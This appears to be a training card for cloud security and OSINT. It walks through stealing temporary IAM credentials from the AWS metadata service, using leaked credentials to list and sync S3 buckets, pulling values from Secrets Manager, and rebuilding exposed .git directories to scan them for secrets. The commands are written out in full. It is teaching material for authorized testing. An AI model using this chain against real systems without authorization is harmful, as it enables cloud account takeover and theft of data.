AWS S3 Bucket OSINT Enumeration: Public Bucket Discovery and Sensitive Data Identification
Theory
Why This Matters
The IMDS-to-S3-to-Git intelligence chain represents one of the most impactful credential exposure pathways in cloud environments. In the 2019 Capital One breach, an SSRF vulnerability allowed access to the AWS Instance Metadata Service (IMDS), yielding temporary IAM credentials that were used to enumerate and exfiltrate over 100 million customer records from S3. Beyond direct SSRF exploitation, threat intelligence analysts find IMDS-sourced credentials appearing in public breach databases, Pastebin dumps, and GitHub repositories — uploaded accidentally by developers who logged cloud environment variables. For investigators, the intelligence value lies in the chain: a single credential leak exposes not just one bucket but potentially entire code repositories, additional credential stores, and development secrets. This chain is also the starting point for assessing an organization's cloud security posture in authorized red team engagements.
Core Concept
The AWS Instance Metadata Service (IMDS) is an HTTP endpoint available to every EC2 instance at the link-local address 169.254.169.254. It provides instance identity documents, user data, and most critically, temporary IAM credentials associated with the instance's attached IAM role. These credentials are available at http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME without any authentication. IMDSv2 (the hardened version) requires a session token obtained via a PUT request before GET requests to credential endpoints, but many instances still run IMDSv1 due to application compatibility.
When IMDS credentials appear in breach data or public repositories, they arrive as a triplet: AccessKeyId, SecretAccessKey, and Token (the session token marking them as temporary STS credentials). Before any active use, analysts validate the credential with aws sts get-caller-identity — a read-only, low-risk API call that returns the IAM identity without touching any data. This is standard operational practice: it confirms credential validity and reveals the IAM role name and account ID, which guides further enumeration.
S3 bucket enumeration with recovered credentials uses aws s3 ls to list buckets the role can access. Even roles with limited policies may have s3:ListAllMyBuckets or s3:GetObject on specific paths. The key pivot is discovering S3 buckets containing git repositories — either raw .git directories uploaded by CI/CD pipelines, or .bundle files created by git bundle create. A .git directory in S3 can be downloaded and restored to a full repository with git clone.
Exposed .git directories on web servers are a parallel discovery path. When a developer deploys by uploading their entire project directory including the .git folder, GET /.git/config returns the git remote URL, branch structure, and sometimes credentials. GitDump automates extraction: it fetches /.git/HEAD, /.git/config, /.git/COMMIT_EDITMSG, and all pack files, then reconstructs the repository locally. truffleHog scans recovered git history for high-entropy strings and known credential patterns across every commit, not just the current HEAD.
Technical Deep-Dive
# IMDSv1 credential retrieval (for authorized testing / understanding the exposure)
# Step 1: Discover attached IAM role name
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Step 2: Retrieve temporary credentials
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# Returns JSON with AccessKeyId, SecretAccessKey, Token, Expiration
# IMDSv2 (token-based):
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token"
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN"
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# Credential validation (ALWAYS first step — read-only, safe)
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
aws sts get-caller-identity
# Returns: Account, UserId, Arn — confirms validity and reveals role name
# S3 enumeration with recovered credentials
aws s3 ls # List all accessible buckets
aws s3 ls s3://bucket-name/ # List bucket contents
aws s3 ls s3://bucket-name/ --recursive | grep -E '.git/|.bundle$|.tar.gz$'
# s3scanner: unauthenticated bucket permission assessment
pip install s3scanner
s3scanner scan --bucket company-backup
# Reports: exists, listable, readable, writable (without credentials)
# GitDump: extract exposed .git directory from web server
git clone https://github.com/Ebryx/GitDump.git
python3 GitDump/gitdump.py -u https://target.com/.git/ -o recovered_repo/
# Then restore as a git repo:
cd recovered_repo && git checkout -- .
# truffleHog: scan recovered git history for secrets
trufflehog git file://./recovered_repo/ --json |
python3 -m json.tool | grep -E '"DetectorName"|"Raw"' | head -40
# GitHub organization-wide secret scan (authorized)
trufflehog github --org=target-org --token=$GITHUB_TOKEN --json |
python3 -m json.tool | grep -E '"DetectorName"|"Repository"|"Raw"'
# Parse IMDS credential JSON from a breach dump entry
import json, datetime, re
raw = ''{
"Code": "Success",
"Type": "AWS-HMAC",
"AccessKeyId": "ASIAQ3EXAMPLE12345",
"SecretAccessKey": "wJalrXUtnFEMI/EXAMPLE/bPxRfiCYEXAMPLEKEY",
"Token": "AQoXnyc4lcK4w==...",
"Expiration": "2024-11-15T18:22:30Z"
}''
creds = json.loads(raw)
exp = datetime.datetime.fromisoformat(creds["Expiration"].replace("Z", "+00:00"))
now = datetime.datetime.now(datetime.timezone.utc)
is_expired = now > exp
key_type = "temporary (STS/role)" if creds["AccessKeyId"].startswith("ASIA") else "long-term (IAM user)"
print(f"Key type : {key_type}")
print(f"Expired : {is_expired} (expiry: {exp})")
# ASIA prefix = temporary credentials from STS AssumeRole / IMDS
# AKIA prefix = long-term IAM user credentials (no expiry)
Intelligence Collection Methodology
- Search breach data and public repositories: Query haveibeenpwned API for the organization's domain to identify known breaches. Search GitHub for
ASIA(temporary AWS key prefix) withorg:target-orgscope. Use theHarvester to enumerate the organization's email domain, then cross-reference against credential leak databases. - Validate any discovered credentials safely: Set
AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY, andAWS_SESSION_TOKENenvironment variables and runaws sts get-caller-identity. This single read-only call confirms validity without modifying any resources. Log the IAM ARN returned for documentation. - Enumerate accessible S3 buckets: Run
aws s3 lswith the recovered credentials. For each bucket, runaws s3 ls s3://bucket-name/ --recursiveand grep for.git/,.bundle,.env,id_rsa,*.pem,*.keyindicators. - Download and restore any discovered git repositories: Use
aws s3 sync s3://bucket-name/.git/ ./recovered.git/thengit clone recovered.git/ restored_repo/. For web-exposed.gitdirectories, use GitDump to reconstruct the repository from HTTP-accessible objects. - Scan all recovered git history: Run truffleHog over the entire git history (
trufflehog git file://./restored_repo/) to identify secrets committed at any point in the repository's history, not just the current HEAD. Git history commonly contains credentials deleted from working files but still present in past commits. - Map the IAM permission boundary: Use Pacu (AWS exploitation framework, authorized use) or enumerate manually with
aws iam get-role --role-name ROLE_NAMEandaws iam list-role-policiesto understand what the recovered role could access. This defines the scope of potential exposure. - Enumerate additional secret stores: From git history, extract any references to AWS Secrets Manager ARNs or SSM Parameter Store paths. Attempt retrieval with the recovered credentials:
aws secretsmanager get-secret-value --secret-id SECRET_ARN. - Document the full chain: Record each hop: breach source → credential type (IMDS temporary vs IAM long-term) → IAM role ARN → accessible buckets → discovered repositories → secrets found in history. This chain of evidence is essential for incident reporting.
Common Intelligence Collection Errors
- Using recovered cloud credentials for active enumeration before validation: Running broad enumeration commands (e.g.,
aws s3 ls --recursiveacross all buckets) with unvalidated or expired credentials generates IAM API calls that appear in CloudTrail logs and may trigger security alerts. Always validate withaws sts get-caller-identityfirst, then scope enumeration to the minimum necessary. - Treating AKIA and ASIA key prefixes identically:
AKIAprefixes indicate long-term IAM user credentials with no automatic expiration — extremely high severity.ASIAprefixes indicate temporary STS credentials with a defined expiration (visible in theExpirationfield). Misclassifying one as the other leads to incorrect severity assessment. - Scanning only HEAD of a recovered git repository: The credential that caused a breach was almost certainly deleted from the current HEAD. truffleHog's value is specifically in scanning every commit across all branches.
git log --all --onelineandgit stash listreveal additional commits and stashes to scan. - Missing
.gitdirectory exposure because it returns 403 on listing: Web servers may forbid directory listing of/.git/while still serving individual files. Always testGET /.git/HEADandGET /.git/configdirectly, as these files are frequently accessible even when directory listing is disabled. - Overlooking user data as a credential source: The IMDS
user-dataendpoint (/latest/user-data) contains the instance initialization script, which developers frequently embed with environment variables including credentials. This is a separate endpoint from the IAM credentials endpoint and is often overlooked. - Assuming s3scanner output is definitive: s3scanner tests a fixed set of permissions (list, read, write). IAM policies may allow specific object-level operations (e.g.,
s3:GetObjecton specific paths) that s3scanner's bucket-level checks do not reveal. Manual testing of specific paths is required after s3scanner flags a bucket.
NICE Framework Alignment
| Code | Knowledge/Skill/Task Statement | How This Card Develops It |
|---|---|---|
| K0058 | Knowledge of network protocols | Understanding HTTP link-local addressing for IMDS access and AWS S3 REST API structure for bucket enumeration |
| K0145 | Knowledge of security assessment approaches | Executing a structured IMDS-to-S3-to-Git credential intelligence chain with defined validation and documentation steps |
| K0272 | Knowledge of network security architecture | Mapping how IAM roles, instance profiles, temporary STS credentials, and S3 bucket policies interact to define the cloud credential attack surface |
| K0427 | Knowledge of encryption algorithms | Distinguishing credential types by prefix (AKIA vs ASIA) and understanding STS token expiration as a security control; recognizing high-entropy string signatures that truffleHog uses to identify secrets |
| S0040 | Skill in identifying and extracting data of interest from various sources | Extracting credentials from breach data, git history, and S3 bucket contents using truffleHog, GitDump, and aws CLI |
| T0569 | Apply and utilize authorized cyber capabilities to achieve objectives | Deploying s3scanner, GitDump, truffleHog, and AWS CLI in authorized cloud intelligence collection engagements |
Further Reading
- Hacking the Cloud — Nick Frichette, AWS IMDS and IAM Credential Abuse (hackingthe.cloud)
- Cloud Security Alliance: Top Threats to Cloud Computing — CSA Research, Vol. 2024 (Cloud Security Alliance)
- Penetration Testing AWS — Andres Riancho, Chapter 6: IAM Credential Extraction (No Starch Press)
Challenge Lab
Reinforce your learning with a hands-on generated challenge based on this card's competency.